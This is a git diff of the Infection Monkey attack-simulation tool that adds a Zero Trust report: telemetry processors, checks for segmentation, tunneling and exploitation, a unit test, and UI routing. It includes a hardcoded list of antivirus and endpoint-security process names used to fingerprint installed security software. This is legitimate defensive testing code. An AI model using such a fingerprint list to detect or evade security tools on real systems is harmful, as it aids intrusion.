if 'wmi' in telemetry_json['data']:
|
||||||
|
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
|
||||||
|
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
||||||
|
wmi_handler.process_and_handle_wmi_info()
|
||||||
|
|
||||||
|
|
||||||
|
def process_aws_data(telemetry_json):
|
||||||
|
if 'aws' in telemetry_json['data']:
|
||||||
|
if 'instance_id' in telemetry_json['data']['aws']:
|
||||||
|
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
|
||||||
|
mongo.db.monkey.update_one({'_id': monkey_id},
|
||||||
|
{'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
|
|
@@ -0,0 +1,13 @@
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
from monkey_island.cc.services.telemetry.zero_trust_tests.tunneling import test_tunneling_violation


def process_tunnel_telemetry(telemetry_json):
    test_tunneling_violation(telemetry_json)
    monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
    if telemetry_json['data']['proxy'] is not None:
        tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json)
        NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
    else:
        NodeService.unset_all_monkey_tunnels(monkey_id)
@@ -0,0 +1,18 @@
from monkey_island.cc.services.edge import EdgeService
from monkey_island.cc.services.node import NodeService


def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
    dst_ip = telemetry_json['data']['machine']['ip_addr']
    dst_domain_name = telemetry_json['data']['machine']['domain_name']
    src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
    dst_node = NodeService.get_monkey_by_ip(dst_ip)
    if dst_node is None:
        dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)

    return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])


def get_tunnel_host_ip_from_proxy_field(telemetry_json):
    tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
    return tunnel_host_ip
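Not part of the diff: a quick standalone illustration of the proxy-field parsing above, assuming the proxy string is a URL-like value with scheme, host and port:

proxy = "http://10.2.2.2:5000"                              # hypothetical proxy field value
tunnel_host_ip = proxy.split(":")[-2].replace("//", "")     # second-to-last colon-separated part is the host
print(tunnel_host_ip)                                       # 10.2.2.2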
@@ -0,0 +1,47 @@
import json

from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \
    STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.services.telemetry.zero_trust_tests.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES


def test_antivirus_existence(telemetry_json):
    current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
    if 'process_list' in telemetry_json['data']:
        process_list_event = Event.create_event(
            title="Process list",
            message="Monkey on {} scanned the process list".format(current_monkey.hostname),
            event_type=EVENT_TYPE_MONKEY_LOCAL)
        events = [process_list_event]

        av_processes = filter_av_processes(telemetry_json)

        for process in av_processes:
            events.append(Event.create_event(
                title="Found AV process",
                message="The process '{}' was recognized as an Anti Virus process. Process "
                        "details: {}".format(process[1]['name'], json.dumps(process[1])),
                event_type=EVENT_TYPE_MONKEY_LOCAL
            ))

        if len(av_processes) > 0:
            test_status = STATUS_PASSED
        else:
            test_status = STATUS_FAILED
        AggregateFinding.create_or_add_to_existing(
            test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
        )


def filter_av_processes(telemetry_json):
    all_processes = telemetry_json['data']['process_list'].items()
    av_processes = []
    for process in all_processes:
        process_name = process[1]['name']
        # This is for case-insensitive `in`. Generator expression is to save memory.
        if process_name.upper() in (known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES):
            av_processes.append(process)
    return av_processes
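Not part of the diff: a small sketch of the case-insensitive matching in filter_av_processes, run against a made-up process list shaped like the telemetry; the AV name list is a trimmed stand-in for the real one.

ANTI_VIRUS_KNOWN_PROCESS_NAMES = [u"MsMpEng.exe"]  # stand-in for the full list

process_list = {
    '1001': {'name': 'msmpeng.exe'},   # matches despite the different case
    '1002': {'name': 'notepad.exe'},   # not an AV process, ignored
}

av_processes = [
    process for process in process_list.items()
    if process[1]['name'].upper() in (name.upper() for name in ANTI_VIRUS_KNOWN_PROCESS_NAMES)
]
print(av_processes)  # [('1001', {'name': 'msmpeng.exe'})]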
@@ -0,0 +1,37 @@
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \
    STATUS_PASSED
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event

COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}"
COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \
    "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}"


def test_new_user_communication(current_monkey, success, message):
    AggregateFinding.create_or_add_to_existing(
        test=TEST_COMMUNICATE_AS_NEW_USER,
        # If the monkey succeeded to create a user, then the test failed.
        status=STATUS_FAILED if success else STATUS_PASSED,
        events=[
            get_attempt_event(current_monkey),
            get_result_event(current_monkey, message, success)
        ]
    )


def get_attempt_event(current_monkey):
    tried_to_communicate_event = Event.create_event(
        title="Communicate as new user",
        message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname),
        event_type=EVENT_TYPE_MONKEY_NETWORK)
    return tried_to_communicate_event


def get_result_event(current_monkey, message, success):
    message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT

    return Event.create_event(
        title="Communicate as new user",
        message=message_format.format(current_monkey.hostname, message),
        event_type=EVENT_TYPE_MONKEY_NETWORK)
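Not part of the diff: the status logic above is intentionally inverted, because a brand-new user that manages to communicate means the zero trust control failed. A one-liner to make that explicit, assuming it runs inside the Monkey Island source tree:

from common.data.zero_trust_consts import STATUS_FAILED, STATUS_PASSED

success = True  # the monkey's new user reached the network
status = STATUS_FAILED if success else STATUS_PASSED  # a working new user means the control failed
print(status)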
@ -0,0 +1,70 @@
|
||||||
|
import json
|
||||||
|
|
||||||
|
from common.data.network_consts import ES_SERVICE
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
|
||||||
|
HTTP_SERVERS_SERVICES_NAMES = ['tcp-80']
|
||||||
|
|
||||||
|
|
||||||
|
def test_open_data_endpoints(telemetry_json):
|
||||||
|
services = telemetry_json["data"]["machine"]["services"]
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
found_http_server_status = STATUS_PASSED
|
||||||
|
found_elastic_search_server = STATUS_PASSED
|
||||||
|
|
||||||
|
events = [
|
||||||
|
Event.create_event(
|
||||||
|
title="Scan Telemetry",
|
||||||
|
message="Monkey on {} tried to perform a network scan, the target was {}.".format(
|
||||||
|
current_monkey.hostname,
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"]),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||||
|
timestamp=telemetry_json["timestamp"]
|
||||||
|
)
|
||||||
|
]
|
||||||
|
|
||||||
|
for service_name, service_data in services.items():
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Scanned service: {}.".format(service_name),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
if service_name in HTTP_SERVERS_SERVICES_NAMES:
|
||||||
|
found_http_server_status = STATUS_FAILED
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
|
||||||
|
service_data["display_name"],
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"],
|
||||||
|
json.dumps(service_data)
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
if service_name == ES_SERVICE:
|
||||||
|
found_elastic_search_server = STATUS_FAILED
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
|
||||||
|
service_data["display_name"],
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"],
|
||||||
|
json.dumps(service_data)
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_DATA_ENDPOINT_HTTP,
|
||||||
|
status=found_http_server_status,
|
||||||
|
events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_DATA_ENDPOINT_ELASTIC,
|
||||||
|
status=found_elastic_search_server,
|
||||||
|
events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
add_malicious_activity_to_timeline(events)
|
|
@ -0,0 +1,87 @@
|
||||||
|
ANTI_VIRUS_KNOWN_PROCESS_NAMES = [
|
||||||
|
u"AvastSvc.exe",
|
||||||
|
u"AvastUI.exe",
|
||||||
|
u"avcenter.exe",
|
||||||
|
u"avconfig.exe",
|
||||||
|
u"avgcsrvx.exe",
|
||||||
|
u"avgidsagent.exe",
|
||||||
|
u"avgnt.exe",
|
||||||
|
u"avgrsx.exe",
|
||||||
|
u"avguard.exe",
|
||||||
|
u"avgui.exe",
|
||||||
|
u"avgwdsvc.exe",
|
||||||
|
u"avp.exe",
|
||||||
|
u"avscan.exe",
|
||||||
|
u"bdagent.exe",
|
||||||
|
u"ccuac.exe",
|
||||||
|
u"egui.exe",
|
||||||
|
u"hijackthis.exe",
|
||||||
|
u"instup.exe",
|
||||||
|
u"keyscrambler.exe",
|
||||||
|
u"mbam.exe",
|
||||||
|
u"mbamgui.exe",
|
||||||
|
u"mbampt.exe",
|
||||||
|
u"mbamscheduler.exe",
|
||||||
|
u"mbamservice.exe",
|
||||||
|
u"MpCmdRun.exe",
|
||||||
|
u"MSASCui.exe",
|
||||||
|
u"MsMpEng.exe",
|
||||||
|
u"rstrui.exe",
|
||||||
|
u"spybotsd.exe",
|
||||||
|
u"zlclient.exe",
|
||||||
|
u"SymCorpUI.exe",
|
||||||
|
u"ccSvcHst.exe",
|
||||||
|
u"ccApp.exe",
|
||||||
|
u"LUALL.exe",
|
||||||
|
u"SMC.exe",
|
||||||
|
u"SMCgui.exe",
|
||||||
|
u"Rtvscan.exe",
|
||||||
|
u"LuComServer.exe",
|
||||||
|
u"ProtectionUtilSurrogate.exe",
|
||||||
|
u"ClientRemote.exe",
|
||||||
|
u"SemSvc.exe",
|
||||||
|
u"SemLaunchSvc.exe",
|
||||||
|
u"sesmcontinst.exe",
|
||||||
|
u"LuCatalog.exe",
|
||||||
|
u"LUALL.exe",
|
||||||
|
u"LuCallbackProxy.exe",
|
||||||
|
u"LuComServer_3_3.exe",
|
||||||
|
u"httpd.exe",
|
||||||
|
u"dbisqlc.exe",
|
||||||
|
u"dbsrv16.exe",
|
||||||
|
u"semapisrv.exe",
|
||||||
|
u"snac64.exe",
|
||||||
|
u"AutoExcl.exe",
|
||||||
|
u"DoScan.exe",
|
||||||
|
u"nlnhook.exe",
|
||||||
|
u"SavUI.exe",
|
||||||
|
u"SepLiveUpdate.exe",
|
||||||
|
u"Smc.exe",
|
||||||
|
u"SmcGui.exe",
|
||||||
|
u"SymCorpUI.exe",
|
||||||
|
u"symerr.exe",
|
||||||
|
u"ccSvcHst.exe",
|
||||||
|
u"DevViewer.exe",
|
||||||
|
u"DWHWizrd.exe",
|
||||||
|
u"RtvStart.exe",
|
||||||
|
u"roru.exe",
|
||||||
|
u"WSCSAvNotifier",
|
||||||
|
# Guardicore Centra
|
||||||
|
# Linux
|
||||||
|
u"gc-agents-service",
|
||||||
|
u"gc-guest-agent",
|
||||||
|
u"gc-guardig",
|
||||||
|
u"gc-digger",
|
||||||
|
u"gc-fastpath",
|
||||||
|
u"gc-enforcement-agent",
|
||||||
|
u"gc-enforcement-channel",
|
||||||
|
u"gc-detection-agent",
|
||||||
|
# Windows
|
||||||
|
u"gc-guest-agent.exe",
|
||||||
|
u"gc-windig.exe",
|
||||||
|
u"gc-digger.exe",
|
||||||
|
u"gc-fastpath.exe",
|
||||||
|
u"gc-enforcement-channel.exe",
|
||||||
|
u"gc-enforcement-agent.exe",
|
||||||
|
u"gc-agent-ui.exe"
|
||||||
|
]
|
|
@@ -0,0 +1,39 @@
from common.data.zero_trust_consts import *
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event


def test_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp):
    events = [
        Event.create_event(
            title="Exploit attempt",
            message="Monkey on {} attempted to exploit {} using {}.".format(
                current_monkey.hostname,
                target_ip,
                exploiter),
            event_type=EVENT_TYPE_MONKEY_NETWORK,
            timestamp=timestamp
        )
    ]
    status = STATUS_PASSED
    if exploit_successful:
        events.append(
            Event.create_event(
                title="Exploit success!",
                message="Monkey on {} successfully exploited {} using {}.".format(
                    current_monkey.hostname,
                    target_ip,
                    exploiter),
                event_type=EVENT_TYPE_MONKEY_NETWORK,
                timestamp=timestamp)
        )
        status = STATUS_FAILED

    AggregateFinding.create_or_add_to_existing(
        test=TEST_MACHINE_EXPLOITED,
        status=status,
        events=events
    )

    add_malicious_activity_to_timeline(events)
@ -0,0 +1,110 @@
|
||||||
|
import itertools
|
||||||
|
from six import text_type
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED
|
||||||
|
from common.network.network_range import NetworkRange
|
||||||
|
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding
|
||||||
|
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
|
||||||
|
|
||||||
|
SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \
|
||||||
|
"from `{src_seg}` segments to `{dst_seg}` segments."
|
||||||
|
|
||||||
|
SEGMENTATION_VIOLATION_EVENT_TEXT = \
|
||||||
|
"Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \
|
||||||
|
"managed to communicate cross segment to {target_ip} (in segment {target_seg})."
|
||||||
|
|
||||||
|
|
||||||
|
def test_segmentation_violation(current_monkey, target_ip):
|
||||||
|
# TODO - lower code duplication between this and report.py.
|
||||||
|
subnet_groups = get_config_network_segments_as_subnet_groups()
|
||||||
|
for subnet_group in subnet_groups:
|
||||||
|
subnet_pairs = itertools.product(subnet_group, subnet_group)
|
||||||
|
for subnet_pair in subnet_pairs:
|
||||||
|
source_subnet = subnet_pair[0]
|
||||||
|
target_subnet = subnet_pair[1]
|
||||||
|
if is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
|
||||||
|
event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet)
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
subnets=[source_subnet, target_subnet],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
|
||||||
|
# type: (Monkey, str, str, str) -> bool
|
||||||
|
"""
|
||||||
|
Checks is a specific communication is a segmentation violation.
|
||||||
|
:param current_monkey: The source monkey which originated the communication.
|
||||||
|
:param target_ip: The target with which the current monkey communicated with.
|
||||||
|
:param source_subnet: The segment the monkey belongs to.
|
||||||
|
:param target_subnet: Another segment which the monkey isn't supposed to communicate with.
|
||||||
|
:return: True if this is a violation of segmentation between source_subnet and target_subnet; Otherwise, False.
|
||||||
|
"""
|
||||||
|
if source_subnet == target_subnet:
|
||||||
|
return False
|
||||||
|
source_subnet_range = NetworkRange.get_range_obj(source_subnet)
|
||||||
|
target_subnet_range = NetworkRange.get_range_obj(target_subnet)
|
||||||
|
|
||||||
|
if target_subnet_range.is_in_range(text_type(target_ip)):
|
||||||
|
cross_segment_ip = get_ip_in_src_and_not_in_dst(
|
||||||
|
current_monkey.ip_addresses,
|
||||||
|
source_subnet_range,
|
||||||
|
target_subnet_range)
|
||||||
|
|
||||||
|
return cross_segment_ip is not None
|
||||||
|
|
||||||
|
|
||||||
|
def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet):
|
||||||
|
return Event.create_event(
|
||||||
|
title="Segmentation event",
|
||||||
|
message=SEGMENTATION_VIOLATION_EVENT_TEXT.format(
|
||||||
|
hostname=current_monkey.hostname,
|
||||||
|
source_ip=get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)),
|
||||||
|
source_seg=source_subnet,
|
||||||
|
target_ip=target_ip,
|
||||||
|
target_seg=target_subnet
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def test_passed_findings_for_unreached_segments(current_monkey):
|
||||||
|
flat_all_subnets = [item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist]
|
||||||
|
create_or_add_findings_for_all_pairs(flat_all_subnets, current_monkey)
|
||||||
|
|
||||||
|
|
||||||
|
def create_or_add_findings_for_all_pairs(all_subnets, current_monkey):
|
||||||
|
# Filter the subnets that this monkey is part of.
|
||||||
|
this_monkey_subnets = []
|
||||||
|
for subnet in all_subnets:
|
||||||
|
if get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) is not None:
|
||||||
|
this_monkey_subnets.append(subnet)
|
||||||
|
|
||||||
|
# Get all the other subnets.
|
||||||
|
other_subnets = list(set(all_subnets) - set(this_monkey_subnets))
|
||||||
|
|
||||||
|
# Calculate the cartesian product - (this monkey subnets X other subnets). These pairs are the pairs that the monkey
|
||||||
|
# should have tested.
|
||||||
|
all_subnets_pairs_for_this_monkey = itertools.product(this_monkey_subnets, other_subnets)
|
||||||
|
|
||||||
|
for subnet_pair in all_subnets_pairs_for_this_monkey:
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
subnets=list(subnet_pair),
|
||||||
|
status=STATUS_PASSED,
|
||||||
|
segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair)
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def get_segmentation_done_event(current_monkey, subnet_pair):
|
||||||
|
return Event.create_event(
|
||||||
|
title="Segmentation test done",
|
||||||
|
message=SEGMENTATION_DONE_EVENT_TEXT.format(
|
||||||
|
hostname=current_monkey.hostname,
|
||||||
|
src_seg=subnet_pair[0],
|
||||||
|
dst_seg=subnet_pair[1]),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
|
@@ -0,0 +1,46 @@
import uuid

from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \
    EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.models.zero_trust.finding import Finding
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import create_or_add_findings_for_all_pairs
from monkey_island.cc.testing.IslandTestCase import IslandTestCase

FIRST_SUBNET = "1.1.1.1"
SECOND_SUBNET = "2.2.2.0/24"
THIRD_SUBNET = "3.3.3.3-3.3.3.200"


class TestSegmentationTests(IslandTestCase):
    def test_create_findings_for_all_done_pairs(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        all_subnets = [FIRST_SUBNET, SECOND_SUBNET, THIRD_SUBNET]

        monkey = Monkey(
            guid=str(uuid.uuid4()),
            ip_addresses=[FIRST_SUBNET])

        # no findings
        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 0)

        # This is like the monkey is done and sent done telem
        create_or_add_findings_for_all_pairs(all_subnets, monkey)

        # There are 2 subnets in which the monkey is NOT
        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2)

        # This is a monkey from 2nd subnet communicated with 1st subnet.
        SegmentationFinding.create_or_add_to_existing_finding(
            [FIRST_SUBNET, SECOND_SUBNET],
            STATUS_FAILED,
            Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK)
        )

        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1)
        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1)
        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 2)
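Not part of the diff: a short worked count of why the test above expects exactly 2 "Passed" findings. The monkey owns an IP only in FIRST_SUBNET, so the (monkey subnets x other subnets) product has 1 * 2 = 2 pairs, one finding per pair; the later FAILED finding for the (FIRST_SUBNET, SECOND_SUBNET) pair updates the existing finding for that pair, which is consistent with the final 1 Passed + 1 Failed assertions.

import itertools

this_monkey_subnets = ["1.1.1.1"]
other_subnets = ["2.2.2.0/24", "3.3.3.3-3.3.3.200"]
pairs = list(itertools.product(this_monkey_subnets, other_subnets))
print(len(pairs))  # 2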
@@ -0,0 +1,27 @@
from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field


def test_tunneling_violation(tunnel_telemetry_json):
    if tunnel_telemetry_json['data']['proxy'] is not None:
        # Monkey is tunneling, create findings
        tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json)
        current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid'])
        tunneling_events = [Event.create_event(
            title="Tunneling event",
            message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
                hostname=current_monkey.hostname, proxy=tunnel_host_ip),
            event_type=EVENT_TYPE_MONKEY_NETWORK,
            timestamp=tunnel_telemetry_json['timestamp']
        )]

        AggregateFinding.create_or_add_to_existing(
            test=TEST_TUNNELING,
            status=STATUS_FAILED,
            events=tunneling_events
        )

        add_malicious_activity_to_timeline(tunneling_events)
@@ -1,6 +1,7 @@
import unittest
from monkey_island.cc.environment.environment import env
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.finding import Finding


class IslandTestCase(unittest.TestCase):
@@ -10,3 +11,7 @@ class IslandTestCase(unittest.TestCase):
    @staticmethod
    def clean_monkey_db():
        Monkey.objects().delete()

    @staticmethod
    def clean_finding_db():
        Finding.objects().delete()
File diff suppressed because it is too large
@@ -55,6 +55,7 @@
    "null-loader": "^0.1.1",
    "phantomjs-prebuilt": "^2.1.16",
    "react-addons-test-utils": "^15.6.2",
    "react-event-timeline": "^1.6.3",
    "react-hot-loader": "^4.3.11",
    "rimraf": "^2.6.2",
    "style-loader": "^0.22.1",
@@ -64,12 +65,15 @@
    "webpack-dev-server": "^3.1.9"
  },
  "dependencies": {
    "@emotion/core": "^10.0.10",
    "@kunukn/react-collapse": "^1.0.5",
    "classnames": "^2.2.6",
    "bootstrap": "3.4.1",
    "classnames": "^2.2.6",
    "core-js": "^2.5.7",
    "d3": "^5.11.0",
    "downloadjs": "^1.4.7",
    "fetch": "^1.1.0",
    "file-saver": "^2.0.2",
    "filepond": "^4.2.0",
    "js-file-download": "^0.4.4",
    "json-loader": "^0.5.7",
@@ -84,6 +88,7 @@
    "react-bootstrap": "^0.32.4",
    "react-copy-to-clipboard": "^5.0.1",
    "react-data-components": "^1.2.0",
    "react-desktop-notification": "^1.0.9",
    "react-dimensions": "^1.3.0",
    "react-dom": "^16.5.2",
    "react-fa": "^5.0.0",
@@ -93,14 +98,13 @@
    "react-jsonschema-form": "^1.0.5",
    "react-redux": "^5.1.1",
    "react-router-dom": "^4.3.1",
    "react-spinners": "^0.5.4",
    "react-table": "^6.8.6",
    "react-toggle": "^4.0.1",
    "react-tooltip-lite": "^1.9.1",
    "redux": "^4.0.0",
    "sass-loader": "^7.1.0",
    "sha3": "^2.0.0",
    "react-spinners": "^0.5.4",
    "pluralize": "^7.0.0"
    "@emotion/core": "^10.0.10",
    "react-desktop-notification": "^1.0.9"
  }
}
@@ -7,10 +7,10 @@ import RunServerPage from 'components/pages/RunServerPage';
 import ConfigurePage from 'components/pages/ConfigurePage';
 import RunMonkeyPage from 'components/pages/RunMonkeyPage';
 import MapPage from 'components/pages/MapPage';
-import PassTheHashMapPage from 'components/pages/PassTheHashMapPage';
 import TelemetryPage from 'components/pages/TelemetryPage';
 import StartOverPage from 'components/pages/StartOverPage';
 import ReportPage from 'components/pages/ReportPage';
+import ZeroTrustReportPage from 'components/pages/ZeroTrustReportPage';
 import LicensePage from 'components/pages/LicensePage';
 import AuthComponent from 'components/AuthComponent';
 import LoginPageComponent from 'components/pages/LoginPage';
@@ -29,6 +29,8 @@ let infectionMonkeyImage = require('../images/infection-monkey.svg');
 let guardicoreLogoImage = require('../images/guardicore-logo.png');
 let notificationIcon = require('../images/notification-logo-512x512.png');

+const reportZeroTrustRoute = '/report/zero_trust';
+
 class AppComponent extends AuthComponent {
   updateStatus = () => {
     this.auth.loggedIn()
@@ -148,7 +150,7 @@ class AppComponent extends AuthComponent {
           </NavLink>
         </li>
         <li>
-          <NavLink to="/report">
+          <NavLink to="/report/security">
             <span className="number">4.</span>
             Security Report
             {this.state.completedSteps.report_done ?
@@ -156,6 +158,15 @@ class AppComponent extends AuthComponent {
               : ''}
           </NavLink>
         </li>
+        <li>
+          <NavLink to="/report/zero_trust">
+            <span className="number">5.</span>
+            Zero Trust Report
+            {this.state.completedSteps.report_done ?
+              <Icon name="check" className="pull-right checkmark text-success"/>
+              : ''}
+          </NavLink>
+        </li>
         <li>
           <NavLink to="/start-over">
             <span className="number"><i className="fa fa-undo" style={{'marginLeft': '-1px'}}/></span>
@@ -190,7 +201,8 @@ class AppComponent extends AuthComponent {
             {this.renderRoute('/infection/map', <MapPage onStatusChange={this.updateStatus}/>)}
             {this.renderRoute('/infection/telemetry', <TelemetryPage onStatusChange={this.updateStatus}/>)}
             {this.renderRoute('/start-over', <StartOverPage onStatusChange={this.updateStatus}/>)}
-            {this.renderRoute('/report', <ReportPage onStatusChange={this.updateStatus}/>)}
+            {this.renderRoute('/report/security', <ReportPage onStatusChange={this.updateStatus}/>)}
+            {this.renderRoute(reportZeroTrustRoute, <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
             {this.renderRoute('/license', <LicensePage onStatusChange={this.updateStatus}/>)}
           </Col>
         </Row>
@@ -200,10 +212,11 @@ class AppComponent extends AuthComponent {
   }

   showInfectionDoneNotification() {
-    if (this.state.completedSteps.infection_done) {
-      let hostname = window.location.hostname;
-      let url = `https://${hostname}:5000/report`;
-      console.log("Trying to show notification. URL: " + url + " | icon: " + notificationIcon);
+    if (this.shouldShowNotification()) {
+      const hostname = window.location.hostname;
+      const port = window.location.port;
+      const protocol = window.location.protocol;
+      const url = `${protocol}//${hostname}:${port}${reportZeroTrustRoute}`;

       Notifier.start(
         "Monkey Island",
@@ -212,6 +225,11 @@ class AppComponent extends AuthComponent {
         notificationIcon);
     }
   }
+
+  shouldShowNotification() {
+    // No need to show the notification to redirect to the report if we're already in the report page
+    return (this.state.completedSteps.infection_done && !window.location.pathname.startsWith("/report"));
+  }
 }

 AppComponent.defaultProps = {};
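As a reading aid, the snippet below restates the notification logic these AppComponent hunks introduce as a standalone sketch. It is illustrative only: the function names are made up, and completedSteps is assumed to have the shape returned by the Island's /api status endpoint.

// Illustrative sketch of the logic added to AppComponent above (not the component itself).
const reportZeroTrustRoute = '/report/zero_trust';

// Assumed shape: completedSteps comes from the Island status API, e.g. {infection_done: true, ...}
function shouldShowNotification(completedSteps) {
  // Skip the redirect notification if the user is already on a report page.
  return completedSteps.infection_done && !window.location.pathname.startsWith('/report');
}

function buildZeroTrustReportUrl() {
  const {protocol, hostname, port} = window.location;
  return `${protocol}//${hostname}:${port}${reportZeroTrustRoute}`;
}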
@@ -1,7 +1,7 @@
 import React from 'react';
 import '../../../styles/Collapse.scss'
-import '../../report-components/StolenPasswords'
-import StolenPasswordsComponent from "../../report-components/StolenPasswords";
+import '../../report-components/security/StolenPasswords'
+import StolenPasswordsComponent from "../../report-components/security/StolenPasswords";
 import {ScanStatus} from "./Helpers"

@@ -1,20 +1,27 @@
-import React from 'react';
+import React, {Fragment} from 'react';
 import {Button, Col} from 'react-bootstrap';
-import BreachedServers from 'components/report-components/BreachedServers';
